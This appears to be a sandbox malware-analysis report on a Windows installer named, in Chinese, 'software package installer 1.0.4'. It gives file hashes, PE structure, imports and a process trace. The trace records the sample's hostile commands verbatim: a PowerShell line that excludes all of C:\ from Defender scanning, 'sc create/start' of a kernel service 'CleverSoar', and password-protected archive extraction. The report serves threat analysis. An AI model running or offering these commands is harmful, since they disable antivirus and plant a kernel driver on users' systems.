                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg...........!.....P..........E........................................ 7...........@.........................H#.......*..<.....6.X.....................6.d?..........................x.......................+...............................text....O.......P.................. ..`.rdata..<....`.......T..............@..@.data........`.......J..............@....00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....voltbl.F....`(.......(..................j)q.....X...p(..Z....(............. ..`.rsrc...X.....6......j6.............@..@.reloc..d?....6..@...p6.............@..B................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:PE32+ executable (console) x86-64, for MS Windows
                      Category:dropped
                      Size (bytes):6144
                      Entropy (8bit):4.720366600008286
                      Encrypted:false
                      SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                      MD5:E4211D6D009757C078A9FAC7FF4F03D4
                      SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                      SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                      SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):3584000
                      Entropy (8bit):7.00283805408099
                      Encrypted:false
                      SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
                      MD5:4DB75814BF4A212D3AEBA5831C059402
                      SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
                      SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
                      SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
                      Malicious:false
                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg...........!.....P..........E........................................ 7...........@.........................H#.......*..<.....6.X.....................6.d?..........................x.......................+...............................text....O.......P.................. ..`.rdata..<....`.......T..............@..@.data........`.......J..............@....00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....voltbl.F....`(.......(..................j)q.....X...p(..Z....(............. ..`.rsrc...X.....6......j6.............@..@.reloc..d?....6..@...p6.............@..B................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):3366912
                      Entropy (8bit):6.530549308235048
                      Encrypted:false
                      SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                      MD5:CCFB5265302C0ED10D4EE3C9C00B07B1
                      SHA1:C89AAFB9E83EF08F32610D12C15840E3ADD3DD06
                      SHA-256:15B6D6F84E5D1A01AE0493EF947045BE2759BF942C603F89A5CD40E01C8894D0
                      SHA-512:0E0CE33F8A70E16753FFA8CB37D60998AB4E2D588E4C661C08568678615D473F6391B5E828B203C3DA5423FD71ABDFF322EDBAFF4273867F30C9A42E6523E99C
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                      File Type:ASCII text, with CRLF, CR line terminators
                      Category:dropped
                      Size (bytes):406
                      Entropy (8bit):5.117520345541057
                      Encrypted:false
                      SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                      MD5:9200058492BCA8F9D88B4877F842C148
                      SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                      SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                      SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                      Malicious:false
                      Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.920986760812326
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 98.04%
                      • Inno Setup installer (109748/4) 1.08%
                      • InstallShield setup (43055/19) 0.42%
                      • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                      File name:#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
                      File size:5'694'753 bytes
                      MD5:44728e21199d2b04a4b25798625ac86e
                      SHA1:382e29a97bb8a34a3164f7464692f16e3526bb1c
                      SHA256:4cd9b5ec751ac76c5e71d500cd4592dbd4fc7ce4e88ea0187fbc04e66f976cc5
                      SHA512:cc8276fe2aa6e57ef9ade90f833dddcbf00b1edb952457c154666aa362fa915b4636d108e1738e420c2421456cc2f85f211eb2b350a0d6da8777f80a9009ee64
                      SSDEEP:98304:XwREBVV+Qh70jV13LgKYVR0jyaTnVWbaAzE0JVdMwZgW:lBCQ8j3LBYVavTIbaiE0JNF
                      TLSH:8D461222F2CBE43EE45D0B3B06B2A15894FB6A616522AD5786ECB4ECCF311501D3F647
                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                      Icon Hash:0c0c2d33ceec80aa
                      Entrypoint:0x4a83bc
                      Entrypoint Section:.itext
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:6
                      OS Version Minor:1
                      File Version Major:6
                      File Version Minor:1
                      Subsystem Version Major:6
                      Subsystem Version Minor:1
                      Import Hash:40ab50289f7ef5fae60801f88d4541fc
                      Instruction
                      push ebp
                      mov ebp, esp
                      add esp, FFFFFFA4h
                      push ebx
                      push esi
                      push edi
                      xor eax, eax
                      mov dword ptr [ebp-3Ch], eax
                      mov dword ptr [ebp-40h], eax
                      mov dword ptr [ebp-5Ch], eax
                      mov dword ptr [ebp-30h], eax
                      mov dword ptr [ebp-38h], eax
                      mov dword ptr [ebp-34h], eax
                      mov dword ptr [ebp-2Ch], eax
                      mov dword ptr [ebp-28h], eax
                      mov dword ptr [ebp-14h], eax
                      mov eax, 004A2EBCh
                      call 00007F23492E36B5h
                      xor eax, eax
                      push ebp
                      push 004A8AC1h
                      push dword ptr fs:[eax]
                      mov dword ptr fs:[eax], esp
                      xor edx, edx
                      push ebp
                      push 004A8A7Bh
                      push dword ptr fs:[edx]
                      mov dword ptr fs:[edx], esp
                      mov eax, dword ptr [004B0634h]
                      call 00007F234937503Bh
                      call 00007F2349374B8Eh
                      lea edx, dword ptr [ebp-14h]
                      xor eax, eax
                      call 00007F234936F868h
                      mov edx, dword ptr [ebp-14h]
                      mov eax, 004B41F4h
                      call 00007F23492DD763h
                      push 00000002h
                      push 00000000h
                      push 00000001h
                      mov ecx, dword ptr [004B41F4h]
                      mov dl, 01h
                      mov eax, dword ptr [0049CD14h]
                      call 00007F2349370B93h
                      mov dword ptr [004B41F8h], eax
                      xor edx, edx
                      push ebp
                      push 004A8A27h
                      push dword ptr fs:[edx]
                      mov dword ptr fs:[edx], esp
                      call 00007F23493750C3h
                      mov dword ptr [004B4200h], eax
                      mov eax, dword ptr [004B4200h]
                      cmp dword ptr [eax+0Ch], 01h
                      jne 00007F234937BDAAh
                      mov eax, dword ptr [004B4200h]
                      mov edx, 00000028h
                      call 00007F2349371488h
                      mov edx, dword ptr [004B4200h]
                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x11000 | .rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      .text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                      .rsrc | 0xcb000 | 0x11000 | 0x11000 | 20f7b0cee625907b1f43c38504803d33 | False | 0.18784466911764705 | data | 3.7212772086393158 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                      RT_ICON | 0xcb678 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.1174924924924925
                      RT_ICON | 0xcc0e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.15792682926829268
                      RT_ICON | 0xcc748 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23387096774193547
                      RT_ICON | 0xcca30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.39864864864864863
                      RT_ICON | 0xccb58 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | English | United States | 0.08339210155148095
                      RT_ICON | 0xce180 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.1023454157782516
                      RT_ICON | 0xcf028 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.10649819494584838
                      RT_ICON | 0xcf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.10838150289017341
                      RT_ICON | 0xcfe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8712011577424024
                      RT_ICON | 0xd1120 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.05668398677373642
                      RT_ICON | 0xd5348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.08475103734439834
                      RT_ICON | 0xd78f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09920262664165103
                      RT_ICON | 0xd8998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2047872340425532
                      RT_STRING | 0xd8e00 | 0x3f8 | data | | | 0.3198818897637795
                      RT_STRING | 0xd91f8 | 0x2dc | data | | | 0.36475409836065575
                      RT_STRING | 0xd94d4 | 0x430 | data | | | 0.40578358208955223
                      RT_STRING | 0xd9904 | 0x44c | data | | | 0.38636363636363635
                      RT_STRING | 0xd9d50 | 0x2d4 | data | | | 0.39226519337016574
                      RT_STRING | 0xda024 | 0xb8 | data | | | 0.6467391304347826
                      RT_STRING | 0xda0dc | 0x9c | data | | | 0.6410256410256411
                      RT_STRING | 0xda178 | 0x374 | data | | | 0.4230769230769231
                      RT_STRING | 0xda4ec | 0x398 | data | | | 0.3358695652173913
                      RT_STRING | 0xda884 | 0x368 | data | | | 0.3795871559633027
                      RT_STRING | 0xdabec | 0x2a4 | data | | | 0.4275147928994083
                      RT_RCDATA | 0xdae90 | 0x10 | data | | | 1.5
                      RT_RCDATA | 0xdaea0 | 0x310 | data | | | 0.6173469387755102
                      RT_RCDATA | 0xdb1b0 | 0x2c | data | | | 1.1818181818181819
                      RT_GROUP_ICON | 0xdb1dc | 0xbc | data | English | United States | 0.6170212765957447
                      RT_VERSION | 0xdb298 | 0x584 | data | English | United States | 0.2790368271954674
                      RT_MANIFEST | 0xdb81c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
                      DLL | Import
                      kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                      comctl32.dll | InitCommonControls
                      user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                      oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                      advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                      Name | Ordinal | Address
                      __dbk_fcall_wrapper | 2 | 0x40fc10
                      dbkFCallWrapperAddr | 1 | 0x4b063c
                      Language of compilation system | Country where language is spoken | Map
                      English | United States |
                      No network behavior found

                      Target ID:0
                      Start time:03:35:00
                      Start date:22/12/2024
                      Path:C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe"
                      Imagebase:0x240000
                      File size:5'694'753 bytes
                      MD5 hash:44728E21199D2B04A4B25798625AC86E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:Borland Delphi
                      Reputation:low
                      Has exited:true

                      Target ID:1
                      Start time:03:35:00
                      Start date:22/12/2024
                      Path:C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$2043A,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe"
                      Imagebase:0xa00000
                      File size:3'366'912 bytes
                      MD5 hash:CCFB5265302C0ED10D4EE3C9C00B07B1
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:Borland Delphi
                      Antivirus matches:
                      • Detection: 0%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      Target ID:2
                      Start time:03:35:01
                      Start date:22/12/2024
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Imagebase:0x7ff788560000
                      File size:452'608 bytes
                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:3
                      Start time:03:35:01
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:4
                      Start time:03:35:04
                      Start date:22/12/2024
                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Imagebase:0x7ff693ab0000
                      File size:496'640 bytes
                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Target ID:5
                      Start time:03:35:06
                      Start date:22/12/2024
                      Path:C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
                      Imagebase:0x240000
                      File size:5'694'753 bytes
                      MD5 hash:44728E21199D2B04A4B25798625AC86E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:Borland Delphi
                      Reputation:low
                      Has exited:false

                      Target ID:6
                      Start time:03:35:06
                      Start date:22/12/2024
                      Path:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$4043E,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
                      Imagebase:0xcd0000
                      File size:3'366'912 bytes
                      MD5 hash:CCFB5265302C0ED10D4EE3C9C00B07B1
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:Borland Delphi
                      Antivirus matches:
                      • Detection: 0%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      Target ID:7
                      Start time:03:35:09
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:8
                      Start time:03:35:09
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:9
                      Start time:03:35:09
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:10
                      Start time:03:35:09
                      Start date:22/12/2024
                      Path:C:\Program Files (x86)\Windows NT\7zr.exe
                      Wow64 process (32bit):true
                      Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                      Imagebase:0x380000
                      File size:831'200 bytes
                      MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Antivirus matches:
                      • Detection: 0%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      Target ID:11
                      Start time:03:35:09
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:12
                      Start time:03:35:09
                      Start date:22/12/2024
                      Path:C:\Program Files (x86)\Windows NT\7zr.exe
                      Wow64 process (32bit):true
                      Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                      Imagebase:0x380000
                      File size:831'200 bytes
                      MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:13
                      Start time:03:35:09
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:14
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:15
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:16
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:17
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
